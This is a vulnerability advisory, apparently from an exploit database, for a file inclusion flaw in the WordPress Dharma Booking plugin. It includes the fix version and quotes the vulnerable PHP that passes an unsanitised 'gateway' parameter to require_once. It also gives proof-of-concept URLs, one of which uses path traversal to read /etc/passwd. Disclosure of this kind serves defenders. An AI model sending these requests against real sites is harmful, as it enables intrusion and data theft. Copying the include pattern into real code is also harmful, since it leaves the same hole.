Wordpress Dharma booking File Inclusion

vendor:

Dharma Booking

by:

AMAR^SHG

7,5

CVSS

HIGH

File Inclusion

CWE

Product Name: Dharma Booking

Affected Version From: <=2.28.3

Affected Version To: 2.28.3

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:dharma_booking

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows/WAMP

2016

WordPress Dharma booking File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'gateway' parameter of '/dharma-booking/frontend/ajax/gateways/proccess.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.

Mitigation:

Update to version 2.28.4 or later.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Dharma booking File Inclusion

# Date: 03/22/2016

# Exploit Author: AMAR^SHG

# Vendor Homepage:https://wordpress.org/plugins/dharma-booking/

<https://webcache.googleusercontent.com/search?q=cache:1BjMckAC9HkJ:https://wordpress.org/plugins/dharma-booking/+&cd=2&hl=fr&ct=clnk&gl=fr>Software
Link : https://wordpress.org/plugins/dharma-booking/

# Version: <=2.28.3

# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00